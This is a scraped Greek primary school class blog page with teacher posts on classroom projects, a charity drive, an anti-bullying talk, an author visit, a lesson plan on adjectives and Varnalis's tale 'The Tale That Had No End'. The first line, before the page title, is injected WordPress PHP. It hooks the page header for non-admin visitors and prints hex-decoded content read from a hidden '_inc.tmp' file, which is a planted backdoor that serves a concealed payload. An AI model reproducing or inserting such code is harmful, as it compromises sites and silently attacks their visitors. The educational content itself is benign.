if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Ε Τάξη |
Get Adobe Flash player

Αναζήτηση

Ιστορικό

Ε Τάξη

Θέλουμε το χρώμα στη σχολική μας ζωή

Κύρια επιδίωξή μας, ως τμήμα μάθησης του δημόσιου εκπαιδευτικού συστήματος, ήταν να περνάμε όλοι ωραία στη σχολική μας καθημερινότητα. Θελήσαμε να διαμορφώσουμε ένα εκπαιδευτικό πλαίσιο όπου θα χαρακτηριζόταν από τη συμμετοχή όλων των μαθητών σε όλες τις δράσεις αλλά και από ένα δάσκαλο που θα άκουγε τις απόψεις των μαθητών, ακόμη και αυτών που δεν εκδηλώθηκαν ποτέ, και θα προσπαθούσε να κάνει καλύτερη τη ζωή των μαθητών στο σχολείο αλλά και θα επεδίωκε να τους κάνει να περιμένουν με χαρά να έρθουν στο σχολείο και όχι να περιμένουν πότε θα έρθει …το τέλος του σχολικού έτους για να γλυτώσουν.Έτσι μέσα σε όλες μας τις δράσεις αποφασίσαμε να βάλουμε και χρώμα στα τετράδιά μας και όχι μόνο να γράφουμε με ένα μαύρο μολύβι έννοιες, αριθμούς, ορισμούς και άλλα που πολλές φορές μας κάνουν ενδεχομένως τη μαθητική μας ζωή δύσκολη. Εμείς ως εκπαιδευτικοί ξέρουμε πολύ καλά ότι μπορούν οι μαθητές μας να μάθουν όλα αυτά που πρέπει μέσα από διαδικασίες ευχάριστες, σύγχρονες και κυρίως θελκτικές ως προς τη μάθηση. Ας διώξουμε τις παλιές πειθαναγκαστικές μεθόδους που προάγουν την παπαγαλία και την αναγκαστική εκμάθηση εννοιών και όρων.
Ο Δάσκαλος του Ε1 Ηλίας Βλάχος
ακολουθούν φωτογραφίες από τα τετράδια της φιλαναγνωσίας και της ελληνικής γλώσσας, όπου διακρίνονται τα κείμενα των μαθητών τα οποία αποτελούν και σε μερικές περιπτώσεις άγνωστη ορθογραφία (πριν τη διόρθωση).

Διατροφικές συνήθειες – ενημέρωση μέσω Skype

Το σχολείο μας ακολουθεί πάντοτε τις νέες επιταγές και προκλήσεις της σύγχρονης ηλεκτρονικής εποχής και συμμετέχει σε εκπαιδευτικές ενημερώσεις – δράσεις που διοργανώνουν φορείς της εκπαίδευσης. Το δημοτικό σχολείο Λεωνιδίου σε συνεργασία με το Χαροκόπειο Πανεπιστήμιο εντάχθηκε στο πρόγραμμα ΕΥΖΗΝ και προχώρησε στην ενημέρωση των μαθητών της Ε΄ τάξης για τη διατροφή και κυρίως την αξία της σωστής διατροφής. Δεν έγινε μια απλή ενημέρωση από την “τηλεματική” εκπρόσωπο του Πανεπιστημίου, αλλά τα παιδιά μας συμμετείχαν ενεργά με ερωτήσεις, απαντήσεις και κυρίως δια μέσου της ανάπτυξης ενός ουσιαστικού διαλόγου για τις τάσεις της νέας εποχής αλλά και τις τάσεις των επαρχιακών πόλεων που εξακολουθούν να υποστηρίζουν τη μεσογειακή και σωστή διατροφή που αιώνες η μια γενιά μετά την άλλη έμαθαν στα μέλη τους.
Ακολουθούν φωτογραφίες.

Ο Δάσκαλος του Ε1 Ηλίας Βλάχος

οι μαθητές γνωρίζουν το εκλογικό σύστημα

Οι μαθητές μας ήρθαν σε επαφή με την εκλογική διαδικασία, μέσα από την εκλογή του μαθητικού τους συμβουλίου. Εργάστηκαν σε κανονικές συνθήκες κι ενδεχομένως πρωτόγνωρες για αυτούς. Παρακολούθησαν σχετικές ελληνικές ταινίες, άκουσαν σχετικά τραγούδια και ζωγράφισαν σε χαρτί Α4 θέματα που αφορούσαν τις εκλογές. όσον αφορά αυτή καθ’ αυτή την εκλογική διαδικασία, αρχικά έθεσαν υποψηφιότητα οι ενδιαφερόμενοι για το μαθητικό συμβούλιο, στη συνέχεια έφτιαξαν την αφίσα του ατομικού εκλογικού τους συνδυασμού, έγραψαν και διάβασαν τον ¨πολιτικό – μαθητικό¨τους λόγο και δέχτηκαν ερωτήσεις από τους συμμαθητές τους.Ακολούθως ορίστηκε η εφορευτική επιτροπή και καταρτίστηκε ο κατάλογος των μαθητών για την ψηφοφορία. Από τη στιγμή που ολοκληρώθηκαν οι τυπικές αλλά και ουσιαστικές διαδικασίες τα παιδιά ψήφισαν με συγκεκριμένη σειρά και πάντα με τη χρήση ψηφοδελτίου το οποίο έριξαν στην κάλπη.
Ακολουθούν σχετικές φωτογραφίες από την όλη διαδικασία.

Ο Δάσκαλος του Ε1 Ηλίας Βλάχος

Παιχνίδια εξάσκησης στη Βυζαντινή ιστορία

Ιστορία Ε’ δημοτικού: Στα βυζαντινά χρόνια
Μαρία Κοντολέου ΠΕ70

Continue reading

Πράξη ήθους

Ως δάσκαλος τους Ε1 θα ήθελα να συγχαρώ τους μικρούς μου μαθητές, τους γονείς τους, τους εκπαιδευτικούς του σχολείου μας αλλά και την ευρύτερη τοπική κοινωνία του δήμου Νότιας Κυνουρίας, που ανταποκρίθηκαν στο κάλεσμα μας (ύστερα από σχετική ενημέρωση με email) για βοήθεια μιας μικρής (άγνωστης) συμμαθήτριάς τους από ένα δημοτικό σχολείο του Περιστερίου. Η μικρή μας φίλη είχε ανάγκη από την οικονομική βοήθεια όλων μας προκειμένου να υποβληθεί σε δύσκολη εγχείρηση. Οι μαθητές του τμήματός μας αμέσως ευαισθητοποιήθηκαν και προχώρησαν στις παρακάτω ενέργειες προκειμένου να συγκεντρώσουν όσα χρήματα μπορούσαν: α) έφτιαξαν λαμπάδες, β) έφτιαξαν αερόστατα του Πάσχα, γ) ενημέρωσαν τους γονείς τους και το άμεσο οικογενειακό τους περιβάλλον, δ)έφτιαξαν καλαθάκια, ε) όρισαν επιτροπή διαχείρισης των χρημάτων που θα συγκέντρωνα. Το αποτέλεσμα τα παιδιά να συγκεντρώσουν το ποσό των 200? και να τα καταθέσουν στην τράπεζα Πειραιώς.
Για μια ακόμη φορά συγχαρητήρια στα παιδιά και στους γονείς των παιδιών για το ήθος τους και την ευαισθησία τους.
Επίσης θα ήθελα να ευχαριστήσω το διευθυντή του σχολείου μας καθώς και το σύλλογο διδασκόντων για τη βοήθειά τους.

Σημείωση:
O λόγος που αναρτήθηκε η συγκεκριμένη ενέργεια και δεν έμεινε γνωστή μόνο στο άμεσο εκπαιδευτικό μας περιβάλλον, δεν είναι για κερδίσουμε τα συγχαρητήρια για το μικρό συμβολικό ποσό που συγκεντρώσαμε αλλά να δείξουμε ότι η εκπαιδευτική κοινότητα δεν χαρακτηρίζεται μόνο από περιστατικά βίας και σχολικού εκφοβισμού (bullying) αλλά και από δράσεις που αναλαμβάνουν οι μικροί μας μαθητές και κάνουν όλους μας να χαιρόμαστε που συμμετέχουμε στη δημόσια εκπαίδευση.
Ο δάσκαλος του Ε1. Ηλίας Βλάχος

Βιωματική δράση με ψυχολόγο από “το χαμόγελο του παιδιού”

Οι μαθητές του Ε.1, Ε.2, ΣΤ. 1, ΣΤ 2, ενημερώθηκαν, από συνεργάτη ψυχολόγο του “χαμόγελου του παιδιού” για τις δράσεις του συγκεκριμένου οργανισμού μη κερδοσκοπικού χαρακτήρα, γνώρισαν την αιτία δημιουργίας του, σημείωσαν το σημαντικό αριθμό sos 10-56 ο οποίος σαν σκοπό του έχει την “προστασία και η προάσπιση των δικαιωμάτων των παιδιών”. Ο συγκεκριμένος αριθμός τον “Μάιο του 2007 αναγνωρίστηκε από το Υπουργείο Υγείας και Κοινωνικής Αλληλεγγύης ως Εθνική Τηλεφωνική Γραμμή για τα Παιδιά, ενώ είναι μέλος του Διεθνούς Δικτύου Τηλεφωνικών Γραμμών για την προστασία των παιδιών (Child Helplines International)”.
Πραγματικά μια ενημέρωση η οποία αναφέρεται σε σημαντικά ζητήματα συμπεριφορών που ενδέχεται να αντιμετωπίσουν οι μαθητές είτε στο σχολείο είτε στην καθημερινότητά τους εκτός σχολείου. Το σχολείο μας είναι ευαισθητοποιημένο στα ζητήματα σχολικής βίας και καθημερινά οι εκπαιδευτικοί συνομιλούν, συζητούν, διοργανώνουν βιωματικά εργαστήρια με τους μαθητές τους προκειμένου να μην υπάρξει ούτε ένα παιδί το οποίο θα βρεθεί να αντιμετωπίσει μια στιγμιαία ή συνεχή άσχημη συμπεριφορά από συμμαθητές του που μπορεί να του δημιουργήσει σημαντικά ψυχολογικά προβλήματα. Σε καμία περίπτωση δεν ξεχωρίζουμε το χώρο του σχολείου από τον ευρύτερο κοινωνικό χώρο και ζητούμε από τους μαθητές μας να έχουν καλή συμπεριφορά κι εκτός σχολικού περιβάλλοντος, διότι το σχολείο αποτελεί αναπόσπαστο κι όχι ξεχωριστό κομμάτι της κοινωνίας. Ιδιαίτερα σήμερα, εξαιτίας των δύσκολων κοινωνικών και οικονομικών συνθηκών που βιώνουμε, πρέπει να κάνουμε τους μαθητές μας και ενεργά μέλη του κοινωνικού συνόλου να καταλάβουν ότι ο διάλογος, η συζήτηση, η ευγένεια και κυρίως η ακοή και ο σεβασμός της διαφορετικής άποψης θα μας οδηγήσουν στην έξοδο από το αδιέξοδο που νιώθουμε ότι έχουμε όλοι μας βρεθεί.
Ο δάσκαλος του Ε.1 Ηλίας Βλάχος

Κοπή πίτας

Το Ε1 έκοψε την πρωτοχρονιάτικη πίτα του. Η κοινή μας ευχή (μαθητών και δασκάλου) το νέο έτος να μας έχει όλους υγιείς και η εκπαιδευτική κοινότητα να εργάζεται απερίσπαστη (όσο αυτό γίνεται) από τη δύσκολη περιρρέουσα ατμόσφαιρα και όλοι μαζί να εργαστούμε ώστε όλα τα παιδιά να χαίρονται που είναι μαθητές και ενεργά μέλη μιας παγκόσμιας εκπαιδευτικής, κοινωνικής και πολιτιστικής κοινότητας.
Ο δάσκαλος του Ε.1 Ηλίας Βλάχος

Φωτεινή όπως ΦΩΣ

Στα πλαίσια του μαθήματος της φιλαναγνωσίας, πραγματοποιήθηκε στις 10/6/2014 στο Δημοτικό Σχολείο Λεωνιδίου συνάντηση με τη συγγραφέα κα. Παναγιώτου Μαίρη για το βιβλίο της «Φωτεινή, όπως φως». Οι μαθητές της Ε΄ και ΣΤ΄ τάξης συμμετείχαν σε έναν ουσιαστικό και δημιουργικό διάλογο με τη συγγραφέα και υπέβαλλαν τις ερωτήσεις τους σχετικά με την ηρωίδα του βιβλίου Φωτεινή ? πραγματικό όνομα κα. Δέσποινα δασκάλα, από τις Κυδωνίες Μικράς Ασίας, που υπηρέτησε σε σχολεία της περιοχής της Νότιας Κυνουρίας. Παρών στην εκδήλωση ήταν ο γιος της κας Δέσποινα κ. Μανώλης Κοζάκος.

Τίτλος βιβλίου: « Φωτεινή, όπως φως», εκδόσεις Όστρια.

«Η Φωτεινή, δασκάλα απ? το Αϊβαλί, ξανθιά, όμορφη και σοβαρή, έρχεται με την οικογένειά της στην Ελλάδα, με τον διωγμό του 1922.

Διορίζεται σε χωριά όπου φορούν ακόμα τσαρούχι και δίνει με αυταπάρνηση τα φώτα της γνώσης της και του πολιτισμού της σε όσους πραγματικά το έχουν ανάγκη.

Βιώνει τις δυσκολίες του πρόσφυγα, κάνει οικογένεια και ζει δραματικές στιγμές στον δεύτερο παγκόσμιο πόλεμο, την κατοχή και τον Εμφύλιο. Μιλάει με πόνο ψυχής για την κατάρα που δέρνει την πατρίδα μας αλλά η συμπεριφορά της διδάσκει αλληλεγγύη και αγάπη προς τον συνάνθρωπο. Ματώνει πολλές φορές η καρδιά της αλλά όπως ομολογεί η ίδια: “Η μοίρα των δυνατών είναι να παραμένουν μόνοι και να παλεύουν χωρίς θεατές».

ΕΚΠΑΙΔΕΥΣΗ ΓΙΑ ΒΙΩΣΙΜΟ ΤΟΥΡΙΣΜΟ

Εκπαιδευτικοι:
Κολενδριανού Αργυρώ  ΠΕ70
Καθαροπούλου Κωνσταντίνα  ΠΕ70
Κρυσταλλόγιαννη Ελένη  ΠΕ20

Στα πλαίσια του προγράμματος Εκπαίδευση για Βιώσιμο Τουρισμό (Τουρισμός και Περιβάλλον) επισκέφθηκε, μετά από πρόσκληση των δασκάλων της τάξης ο κ. Ντάσκας Γρηγόρης (Κατασκευαστής Τουριστικών κατοικιών) ? Πρώην Ειδικός Σύμβουλος Δημάρχου Ν. Κυνουρίας για θέματα Τουριστικής Ανάπτυξης και Δημοτικών Ακινήτων)

 P3060004.JPG

Σε τρία δίωρα ανέπτυξε τα εξής θέματα:

«Αρχιτεκτονική κληρονομιά και Τουρισμός»

«Μαζικός Τουρισμός και κατοικία»

«Μαζικός Τουρισμός και Φυσική Κληρονομιά»

καθώς και «Οδικό δίκτυο και βιώσιμη Ανάπτυξη»

 

  • Ο κ. Ντάσκας με εξαιρετικά κατανοητό τρόπο βοήθησε τους μαθητές, να οδηγηθούν στην επίτευξη των παρακάτω στόχων
  • Κατανόηση της έννοιας της αρχιτεκτονικής κληρονομιάς
  • Αναγνώριση, γνωριμία με τοπικά μνημεία αρχιτεκτονικής κληρονομιάς
  • Ευαισθητοποίηση για την προστασία και διατήρηση της αρχιτεκτονικής κληρονομιάς
  • Ανάπτυξη της παρατηρητικότητας
  • Αισθητική Καλλιέργεια
  • Γνωριμία με θεσμούς, φορείς και οργανισμούς που ασχολούνται με την προστασία, διατήρηση και συντήρηση της αρχιτεκτονικής κληρονομιάς
  • Ευαισθητοποίηση σε θέματα προστασίας της ποιότητας της κατοικίας
  • Κατανόηση των επιπτώσεων από την ανάπτυξη του μαζικού τουρισμού στο φυσικό περιβάλλον
  • Ευαισθητοποίηση σε θέματα προστασίας του φυσικού περιβάλλοντος ως τουριστικού πόρου και της σημασίας του για τη βιωσιμότητα του τουρισμού

P3060001.JPG

Οι μαθητές και οι δασκάλες της Ε? τάξης ευχαριστούν τον κ. Ντάσκα.

 

Η λειτουργία του επιθέτου στο αφηγηματικό κείμενο

Εκπαιδευτικοι:

Κολενδριανού Αργυρώ  ΠΕ70
Καθαροπούλου Κωνσταντίνα  ΠΕ70
Κρυσταλλόγιαννη Ελένη  ΠΕ20

 

Η λειτουργία του επιθέτου στο αφηγηματικό κείμενο

 

Ταυτότητα σεναρίου

Αφορά τη γνωστική περιοχή του γλωσσικού μαθήματος της Ε? τάξης και συγκεκριμένα μπορεί να ενταχθει στην τέταρτη ενότητα με τίτλο «Τα ζώα που ζουν κοντά μας» σελ. 51,52. χρησιμοποιούμε επίθετα και μετοχές με λειτουργία επιθέτου σελ. 56, άσκηση 2 σελ. 57, ασκήσεις 3-4, σελ. 60 άσκηση 4.

 

Διδακτικοί στόχοι

α) Να κατανοήσουν οι μαθητές/τριες τη λειτουργία του επιθέτου στο αφηγηματικό κείμενο

β) Να εξοικειωθούν με την κλίση των επιθέτων και ειδικότερα με την κλίση των επιθέτων σε ?υς, -ια, -υ

γ) Να οικοδομήσουν ένα αφηγηματικό κείμενο αξιοποιώντας την προηγούμενη γνώση

δ) Να εξοικειωθούν με την ηλεκτρονική ανάγνωση των κειμένων

 

2. Ως προς τη μαθησιακή διαδικασία οι διδακτικοί στόχοι είναι η καλλιέργεια της διερευνητικής και συνεργατικής μάθησης.

 

Εφαρμογή 3 δίωρα

 

1ο δίωρο: Αφού διαβάσουν το παραμύθι, ακολουθει συζήτηση γύρω από το περιεχόμενο του παραμυθιού, εντοπίζοντας τα δομικά στοιχεία της αφήγησης (έχουν αποτελέσει αντικείμενο προηγούμενης διαδικασίας) και ανακοινώνονται στην τάξη.

Στη συνέχεια καλούνται να αναγνωρίσουν τα επίθετα που χαρακτηρίζουν τους ήρωες τους και να αντικαταστήσουν τα αντίθετα τους.

 

Στόχος της εργασίας είναι να ανακαλύψουν και να συνειδητοποιήσουν τα παιδιά ότι με τη χρήση των επιθέτων ο αφηγηματικός λόγος εμπλουτίζεται με αξιολογικές κρίσης και σχόλια της συμπεριφοράς των ηρώων.

Η αντικατάσταση με τα αντίθετα αφενός βοηθά στην ανάδειξη της «άλλης» όψης των χαρακτήρων καθώς και στο ότι τα αντιθετικά δίδυμα είναι εκείνα που βοηθούν τη σκέψη και τη γλώσσα.

 

Σ? αυτή τη δραστηριότητα με τη βοήθεια του δασκάλου διερευνούν τα σημεία του παραμυθιού όπου τα επίθετα χρησιμοποιούνται για να δημιουργήσουν νοητικές εικόνες (ξαπλωμένος στο ντιβάνι?) και τα υπογραμμίζουν

 

2ο δίωρο: Δημιουργούν ένα πίνακα με όλες τις γραμματικές κατηγορίες των επιθέτων και κάτω από κάθε κατηγορία να βάλουν και ένα παράδειγμα από το παραμύθι.

 

Φύλλο εργασίας 2

3ο δίωρο:Καλούνται να επιλέξουν από κοινού έναν τίτλο παραμυθιού και να γράψουν τον δικό τους αφηγηματικό κείμενο ακλουθώντας τη δομή των αφηγηματικών κειμένων

Ως προς τη γλωσσική συγκρότηση πρέπει να προσέξουν την ορθογραφημένη χρήση επιθέτων από την πλευρά του αφηγητή κατάλληλων να δηλωθούν αξιολογικές κρίσεις και να αποδοθούν νοητικές εικόνες.

 Με την παραγωγή γραπτού λόγου τα παιδιά εμπλέκονται ενεργά σε μια διαδικασία τελικής αξιολόγησης της χρήσης νέας γνώσης στην οικοδόμηση ενός παραμυθιού

toparamithipoudeneixetelos.jpg

Το παραμύθι που δεν είχε τέλος – Κώστας Βάρναλης

Ζούσε κάποτε πέρα στην Ανατολή ένας τεμπέλης βασιλιάς. Δεν έκανε καμιά δουλειά. Ολημερίς ξαπλωμένος σε ντιβάνι με πολλά μαλακά μαξιλάρια, έβαζε να του λένε παραμύθια κι αυτός άκουε μαχμουρλίδικα.
Αμολούσε σ? όλο του το βασίλειο πλήθος αυλικούς να μαζεύουνε και να στέλνουνε στο παλάτι όσους ξέρανε παραμύθια, άντρες ή γυναίκες, γέρους ή νέους, ντόπιους ή ξένους. Γιατί δε χόρταινε ν? ακούει. Όταν τέλειωνε το παραμύθι, έπεφτε σε βαθιά πλήξη και δυστυχία. Γι? αυτό ήθελε πάντα το ένα παραμύθι ν? ακολουθάει το άλλο. Ακόμα κι όταν έτρωγε κι έπινε ή έπαιρνε το μπάνιο του στη χαβούζα* του παλατιού, ήθελε ν? ακούει παραμύθια. Μονάχα αργά πολύ, μετά τα μεσάνυχτα, όταν τον έπαιρνε ο ύπνος, τότε σιωπούσανε κι οι παραμυθάδες και, πατώντας στα νύχια τους απάνω στα παχιά κιλίμια, φεύγανε σιγά σιγά να πάνε να ξεκουραστούνε κι αυτοί, οι βασανισμένοι!
Όσο πιο μεγάλο και μπερδεμένο ήταν το παραμύθι, τόσο περισσότερο του άρεσε. Ήταν παραμύθια που βαστούσανε μέρες και βδομάδες ολάκερες. Μα όσο μεγάλα και να ήτανε, ερχότανε επιτέλους η ώρα τους να τελειώσουν. Ε, τότε ο βασιλιάς γινότανε τρομερά δυστυχής. Αρρωστούσε, που έλεγες πως θα πεθάνει.
Είδε κι απόειδε αυτός, η δωδεκάδα του (το συμβούλιό του) κι ο γιατρός του, αποφασίσανε όλοι μαζί να στείλουνε τελάληδες* σ? όλες τις επαρχίες και σε όλα τα χωριά του βασιλείου, να διαλαλήσουνε:
? Όποιος ξέρει ένα παραμύθι που να μην τελειώνει ποτέ, ας παρουσιαστεί να το πει του πολυχρονεμένου βασιλιά, κι αυτός θα του δώσει ένα σακί φλουριά και την κόρη του για γυναίκα.
Όσοι ακούγανε αυτά τα λόγια, αστράφτανε τα μάτια τους από τον πόθο να γίνουνε πολύ πλούσιοι και να παντρευτούν τη βασιλοπούλα. Κι όλοι νομίζανε πως θα τα καταφέρνανε να διηγηθούνε παραμύθι χωρίς τέλος. Το κάτω της γραφής, αν αποτυχαίνανε, δε θα είχανε να χάσουνε τίποτα.
Μα οι τελάληδες προσθέτανε στο τέλος:
? Όποιος όμως δε τα καταφέρει να διηγηθεί το ατέλειωτο παραμύθι, τότε ο βασιλιάς θα του κόψει το κεφάλι!
Όταν ακούγανε αυτήν την ποινή, τους έπιανε τρόμος και φόβος. Τότε νιώθανε πως ο βασιλιάς δε ζητούσε εύκολο πράμα. Και λέγανε συναμεταξύ τους:
? Αδύνατα πράγματα ζητάει.
Ωστόσο παρουσιαστήκανε στο βασιλιά δυο τρεις αποφασισμένοι ή να κερδίσουνε το στοίχημα ή να χάσουνε το κεφάλι τους. Ο πρώτος, που δοκίμασε να πει το ατέλειωτο παραμύθι, μπόρεσε να το βαστάξει τρεις μήνες. Μα ύστερα η φαντασία του είχε στερέψει. Μασούσε τα λόγια του, δεν έβρισκε τίποτα να πει και έτσι έχασε το κεφάλι του.
Τότε οι άλλοι δυο φοβηθήκανε κι ούτε καν τολμήσανε ν? αρχίσουνε. Φύγανε, κι ευχαριστούσανε μάλιστα το Θεό που γλυτώσανε απ? του Χάρου τα δόντια.
Πέρασε πολύς, πάρα πολύς καιρός, και κανένας δεν ερχόταν στο παλάτι γι? αυτή τη δουλειά.
Όπου νά σου μια μέρα και παρουσιάζεται ένας ξένος ?από πού ήταν, κανένας δεν ήξερε. Μα η εξυπνάδα του και το θάρρος του ήταν μεγάλα.
? Μεγάλε βασιλιά, είπε, αφού έκανε τον απαραίτητο τεμενά.* Άκουσα πως δίνεις μεγάλη αμοιβή σε κείνον που θα σου διηγηθεί ένα παραμύθι χωρις τέλος. Του δίνεις ένα σακί φλουριά και τη βασιλοπούλα. Είναι αλήθεια;
? Αλήθεια, απάντησε ο βασιλιάς. Αν όμως δεν πετύχει, τότε του παίρνω το κεφάλι.
? Το ξέρω κι αυτό, είπε ο ξένος. Κι είμαι αποφασισμένος να σου διηγηθώ εγώ μια ιστορία που δεν τελειώνει.
? Περιμένω ν? αρχίσεις, είπε ο βασιλιάς και ξαπλώθηκε στον καναπέ απάνω στα πολλά μαξιλάρια.
Τότε ο ξένος στρογγυλοκάθισε στο πάτωμα απάνω στο κιλίμι μπροστά στο βασιλιά κι άρχισε:
«Μια φορά κι έναν καιρό ήταν ένας μεγάλος βασιλιάς, που μάζεψε όλο το σιτάρι της απέναντι χώρας του και το κλείδωσε σε μιαν αποθήκη τόσο μεγάλη, που για να πας από την μιαν άκρη της έως την άλλη θα έπρεπε να περπατάς από το πρωί ίσαμε το βράδυ.
»Μια μέρα έπεσε στην πρωτεύουσα ένα μαύρο σύννεφο ακρίδες τόσο μεγάλο, που σκοτείνιασε ο ήλιος κι όλοι νομίσανε πως ήρθε η συντέλεια του κόσμου. Γιατί γεμίσανε οι δρόμοι, τα σπίτια, ο αέρας, από ακρίδες τόσο πυκνές, που δεν μπορούσες ν ?ανασάνεις.
»Αυτές οι αμέτρητες ακρίδες, αφού φάγανε όλα τα αμπέλια και τα δάση και δε χορτάσανε, μυριστήκανε τελευταία και την αποθήκη του σιταριού. Μα η αποθήκη ήταν πολύ καλά κλεισμένη από παντού, κι όχι μονάχα δεν είχε παράθυρα ή καμινάδες, μα ούτε και καμιά σκισμάδα για να μπορέσουνε να τρυπώσουνε μέσα και να φάνε το σιτάρι.

»Κάμποσες μέρες φέρνανε βόλτα γύρω στην αποθήκη και κοιτάζανε με προσοχή όλες τις μεριές, μπας και βρεθεί πουθενά καμιά τρυπίτσα ή καμιά χαραμάδα. Μα επιτέλους μια τυχερή ακρίδα ανακάλυψε στην ανατολική πλευρά της αποθήκης μια μικρούλα σκισμάδα, που μόλις χωρούσε μοναχή της. Μπήκε το λοιπόν μέσα, πήρε ένα σπειρί σιτάρι και βγήκε.
»Άμα βγήκε αυτή, μπήκε μια δεύτερη ακρίδα, πήρε κι αυτή ένα δεύτερο σπειρί σιτάρι και βγήκε. Άμα βγήκε κι αυτή, μπήκε μια τρίτη ακρίδα, πήρε κι αυτή ένα τρίτο σπειρί σιτάρι και βγήκε. Ύστερα μπήκε μια τέταρτη ακρίδα και πήρε ένα τέταρτο σπειρί σιτάρι, κι άμα βγήκε κι αυτή, μπήκε μια πέμπτη ακρίδα κτλ?»
Περάσανε μέρες, βδομάδες, μήνες, χρόνια, κι ο ξένος αξακολουθούσε να λέει από το πρωί ώς το βράδυ το ίδιο πράμα:
«Ύστερα μπήκε μια άλλη ακρίδα και πήρε άλλο σπειρί σιτάρι. Άμα βγήκε αυτή, μπήκε άλλη ακρίδα και πήρε ένα άλλο σπειρί σιτάρι?»
Περάσανε έτσι δυο χρόνια κι ο ξένος έλεγε και ξανάλεγε από το πρωί ώς το βράδυ το ίδιο χαβά.* Ο βασιλιάς στενοχωριότανε πολύ, ώσπου μια μέρα τονε ρώτησε θυμωμένος:
? Δε μου λες, πόσον καιρό αυτές οι ακρίδες θα μπαίνουνε και θα βγαίνουνε;
? Μα, βασιλιά μου πολυχρονεμένε, ώς τώρα οι ακρίδες αδειάσανε μια πιθαμή σιτάρι από την αποθήκη. Και μένουνε ακόμα τριακόσιες πιθαμές και μιλιούνια ακρίδες. Ίσως μετά εξακόσια χρόνια θα κατορθώσουν να μπούνε στην αποθήκη όλες οι ακρίδες μια μια και ν? αδειάσουνε το σιτάρι. Και πάλι βλέπουμε?

Τότε πια ο βασιλιάς δε βάσταξε. Γούρλωσε τα μάτια του, τινάχτηκε από το ντιβάνι και ξεφώνισε με όλη του τη δύναμη:

? Καταραμένε άνθρωπε. Θα με τρελάνεις! Άι στο καλό! Έχασα το στοίχημα! Πάρε το σακί τις λίρες και την κόρη μου κι άφησέ με ήσυχο.
Έτσι ο έξυπνος αυτός ξενοτοπίτης πήρε τα χρήματα, πήρε τη βασιλοπούλα κι έγινε και διάδοχος του θρόνου.

Ο βασιλιάς είχε γεράσει πολύ κι ευχαριστιότανε τώρα ν? ακούει παραμύθια κι ιστορίες που είχανε τέλος. Κάθε τόσο συνήθιζε να λέει:
? Είμαι ευχαριστημένος, που έμαθα πως μονάχα οι ιστορίες που τελειώνουν είναι όμορφες κι έχουνε ενδιαφέρον.
Άμα πέθανε, έγινε βασιλιάς ο έξυπνος γαμπρός του. Και το κράτος ευτύχησε. Μα οι ιστορικοί δε συμφωνήσανε ακόμα από ποιον τόπο ήταν αυτός ο ξένος.

χαβούζα: δεξαμενή.

* τελάλης: κήρυκας.
* ο τεμενάς: η υπόκλιση.
* χαβάς: τραγούδι, τα ίδια λόγια.

(από το βιβλίο: Aνθολόγιο για τα παιδιά του Δημοτικού, μέρος δεύτερο, Oργανισμός Eκδόσεως Διδακτικών Bιβλίων, 1975)

 

domika stoixeia.jpg

 

 

 

 

Λέξεις Κλειδιά σε αναζητήσεις: